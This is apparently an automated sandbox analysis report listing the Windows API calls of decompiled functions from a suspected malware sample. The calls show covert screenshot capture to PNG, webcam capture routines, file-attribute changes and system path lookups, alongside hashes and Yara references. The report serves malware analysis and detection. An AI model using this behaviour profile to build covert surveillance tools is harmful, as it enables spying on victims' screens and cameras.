                                • Part of subcall function 0040DECB: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0040DF84
                                • Part of subcall function 0040DECB: ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(0040E3AF,00000024,00000001,?,?,?,?,00000000), ref: 0040DFA0
                                • Part of subcall function 0040DECB: ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DFAC
                                • Part of subcall function 0040DECB: ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DFC4
                                • Part of subcall function 0040DECB: ??2@YAPAXI@Z.MSVCRT ref: 0040DFDD
                                • Part of subcall function 0040DECB: ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040DFED
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015), ref: 0040E3C6
                              • atoi.MSVCRT ref: 0040E3CD
                              • Sleep.KERNEL32(00000000), ref: 0040E3DB
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,?,00000000), ref: 0040E3ED
                              • atoi.MSVCRT ref: 0040E3F4
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@??4?$basic_string@D@2@@0@D@std@@@std@@Hstd@@V01@V01@@V?$basic_string@$?data@?$basic_string@D@1@@V10@$??2@SleepV12@atoi$??0?$basic_ifstream@?is_open@?$basic_ifstream@?length@?$basic_string@?seekg@?$basic_istream@?size@?$basic_string@?substr@?$basic_string@?tellg@?$basic_istream@AddressCreateDirectoryGdiplusH@2@H_prologLibraryLoadProcStartupV10@0@V?$fpos@W4seekdir@ios_base@2@@_itoambstowcs
                              • String ID: .png$dat
                              • API String ID: 1729542619-928648711
                              • Opcode ID: eb964dcf7b595083339692b5b74ef4d98046628b7e17e336a57c67d4bc071420
                              • Instruction ID: 2d142cc77db60d4ea9aa91cc9091b160e98ce930e77952c3d99f5e8faa0b95a7
                              • Opcode Fuzzy Hash: eb964dcf7b595083339692b5b74ef4d98046628b7e17e336a57c67d4bc071420
                              • Instruction Fuzzy Hash: 44715271900109EBCB14ABA1EC5DAEE7B7CAB44305F00847AF506B61A1DFB85E89CB59
                              Function 00403AE3 Relevance: 69.2, APIs: 46, Instructions: 194sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNEL32(00002710), ref: 00403AFC
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00403B08
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403B1D
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00403B24
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000080), ref: 00403B35
                              • SetFileAttributesA.KERNEL32(00000000), ref: 00403B3C
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00403B50
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000A,00000001), ref: 00403B61
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403B6E
                              • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403B7A
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 00403B8C
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403B99
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403BA5
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403BB9
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403BC6
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403BCF
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403BE3
                                • Part of subcall function 0040F44C: ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(0040E390,00000001,00000001), ref: 0040F462
                                • Part of subcall function 0040F44C: ??Bios_base@std@@QBEPAXXZ.MSVCP60(00000000), ref: 0040F487
                                • Part of subcall function 0040F44C: ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F498
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000025,00000001), ref: 00403BFE
                              • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403C0B
                              • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403C17
                              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 00403C2E
                              • malloc.MSVCRT ref: 00403C3E
                              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000), ref: 00403C51
                              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000), ref: 00403C5F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,00000000), ref: 00403C86
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403C8F
                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403C6B
                                • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,?,dt@,00000000), ref: 00402A40
                                • Part of subcall function 00402A2A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402A4C
                                • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402A61
                                • Part of subcall function 00402A2A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403C9B
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403CAB
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403CB4
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403CBE
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000032,00000001,?,00000000), ref: 00403CDA
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403CE7
                              • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403CF3
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403D00
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403D0A
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000), ref: 00403D17
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403D23
                              • free.MSVCRT(00000000), ref: 00403D2A
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403D37
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403D40
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403D49
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 00403D59
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 00403D6D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000006), ref: 00403D7C
                              • SetFileAttributesA.KERNEL32(00000000), ref: 00403D83
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$D@std@@@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@?data@?$basic_string@?length@?$basic_string@AttributesFileV01@V01@@V12@$??0?$basic_ifstream@??0?$basic_ofstream@??4?$basic_string@?close@?$basic_ofstream@?is_open@?$basic_ofstream@D?$basic_ifstream@D?$basic_ofstream@D@1@@V?$basic_string@$??6std@@??9std@@?close@?$basic_ifstream@?is_open@?$basic_ifstream@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@?write@?$basic_ostream@Bios_base@std@@D@2@@0@D@2@@0@@D@std@@@0@H@2@SleepV10@V?$basic_ostream@V?$fpos@W4seekdir@ios_base@2@@Y?$basic_string@freemalloc
                              • String ID:
                              • API String ID: 3087783639-0
                              • Opcode ID: 8af6aaee2c5f5c82285cf85a3cae82adee4e120e0fe4b5b0986eb998f2ebf055
                              • Instruction ID: e0a08072a2f7578a4e0edfff01c58fb7a8cb1c357dd6a501c8ceff23d305a88f
                              • Opcode Fuzzy Hash: 8af6aaee2c5f5c82285cf85a3cae82adee4e120e0fe4b5b0986eb998f2ebf055
                              • Instruction Fuzzy Hash: 74711A3164011A9BCB15ABA0EC9DAEE7B39AF54305F0081B9F107A61E0DFB45EC9CF58
                              Function 0040712F Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 148COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040713F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407177
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\system32,?,WinDir), ref: 004071AE
                              • getenv.MSVCRT ref: 004071BE
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071C9
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004071D4
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004071E0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071E9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071F2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071FB
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 0040720F
                              • getenv.MSVCRT ref: 0040721F
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040722A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407235
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407241
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407253
                              • getenv.MSVCRT ref: 00407271
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 0040727C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104,00000000), ref: 00407292
                              • GetLongPathNameA.KERNEL32(00000000), ref: 00407299
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 004072AB
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108CC,?,00000000), ref: 004072BE
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 004072D4
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004072DF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004072EB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072F6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407308
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407311
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040731A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@$??4?$basic_string@D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@getenv$?c_str@?$basic_string@LongNamePath
                              • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                              • API String ID: 3803880367-1609423294
                              • Opcode ID: 66b9f45a2994cec3ad18d29cfdbe4066c6872474b4df64d1aa737fa0b3d2d247
                              • Instruction ID: 2eda70330f8664ebbc080e427488994969dc3d13a538355b743bf2b4edd7a6ea
                              • Opcode Fuzzy Hash: 66b9f45a2994cec3ad18d29cfdbe4066c6872474b4df64d1aa737fa0b3d2d247
                              • Instruction Fuzzy Hash: 68518D7290410EEBCB14DBA0EE5EDEE7778EF54305B204176F506A2090DEB86F89CB59
                              Function 0040DECB Relevance: 63.2, APIs: 33, Strings: 3, Instructions: 183libraryfileloaderCOMMON
                              Download Yara Rule
                              APIs
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040DEEC
                              • mbstowcs.MSVCRT ref: 0040DEF8
                                • Part of subcall function 0040D71E: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040D731
                                • Part of subcall function 0040D71E: CreateCompatibleDC.GDI32(00000000), ref: 0040D73D
                                • Part of subcall function 0040D71E: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040D74F
                                • Part of subcall function 0040D71E: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040D757
                                • Part of subcall function 0040D71E: CreateCompatibleBitmap.GDI32(00000000,76F90F00,00000000), ref: 0040D760
                                • Part of subcall function 0040D71E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,00000000), ref: 0040D8B2
                              • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,00000000), ref: 0040DF1B
                              • GetProcAddress.KERNEL32(00000000), ref: 0040DF22
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DF30
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,00000000), ref: 0040DF3A
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0040DF84
                              • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(0040E3AF,00000024,00000001,?,?,?,?,00000000), ref: 0040DFA0
                              • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DFAC
                              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DFC4
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040DFDD
                              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040DFED
                              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040E003
                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E00F
                              • DeleteFileA.KERNEL32(0040E3AF,?,?,?,?,00000000), ref: 0040E018
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E025
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,00000000), ref: 0040E02E
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(0040E3AF,?,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0040E06A
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E073
                              • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000003,?,?,?,?,00000000), ref: 0040E080
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,dat,?,?,?,?,00000000), ref: 0040E093
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E09F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E0A8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,00000001,?,?,?,?,?,?,?,00000000), ref: 0040E0B5
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E0C2
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E0D4
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E0E1
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E0ED
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E0F9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E102
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040E10B
                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,00000000), ref: 0040E117
                                • Part of subcall function 0040DDA1: GdipDisposeImage.GDIPLUS(?,0040E125,?,?,?,?,00000000), ref: 0040DDAA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000), ref: 0040E128
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$D@std@@@std@@$??1?$basic_string@$?c_str@?$basic_string@CreateV12@$??0?$basic_string@??2@?data@?$basic_string@?length@?$basic_string@CapsCompatibleD@1@@Device$??0?$basic_ifstream@??0?$basic_ofstream@??4?$basic_string@?close@?$basic_ifstream@?close@?$basic_ofstream@?is_open@?$basic_ifstream@?read@?$basic_istream@?resize@?$basic_string@?seekg@?$basic_istream@?size@?$basic_string@?tellg@?$basic_istream@?write@?$basic_ostream@AddressBitmapD?$basic_ifstream@D?$basic_ofstream@D@2@@0@DeleteDisposeFileGdipH@2@Hstd@@ImageLibraryLoadProcV01@V01@@V10@V?$basic_string@V?$fpos@W4seekdir@ios_base@2@@mbstowcs
                              • String ID: Shlwapi.dll$dat$image/png
                              • API String ID: 3855994960-268849978
                              • Opcode ID: b94d99f16394994babad2cfec5dda0844aa583130935d951c0e243812b5ed4c3
                              • Instruction ID: 50900ce0a1674e933a04bd46031eee92378d76cf936f2abeadaca34bfabdd0a9
                              • Opcode Fuzzy Hash: b94d99f16394994babad2cfec5dda0844aa583130935d951c0e243812b5ed4c3
                              • Instruction Fuzzy Hash: 1161E972900119AFCB15ABA0EC9D9EE7B78FF54305F0045BAF506A60A0DFB45A89CF58
                              Function 00401CBE Relevance: 59.7, APIs: 23, Strings: 11, Instructions: 199COMMON
                              Download Yara Rule
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00415268), ref: 00401CD1
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401CE0
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00401D00
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,camdlldata), ref: 00401D15
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 00401D2D
                                • Part of subcall function 004052EC: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 0040530E
                                • Part of subcall function 004052EC: MapViewOfFileEx.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,0040BBF3,00000000), ref: 0040531D
                                • Part of subcall function 004052EC: CloseHandle.KERNEL32(00000000,?,0040BBF3,00000000), ref: 00405326
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,initcamcap,00415268,004151F0,?,?,00000000,CloseCamera,00000000,OpenCamera), ref: 00401D9F
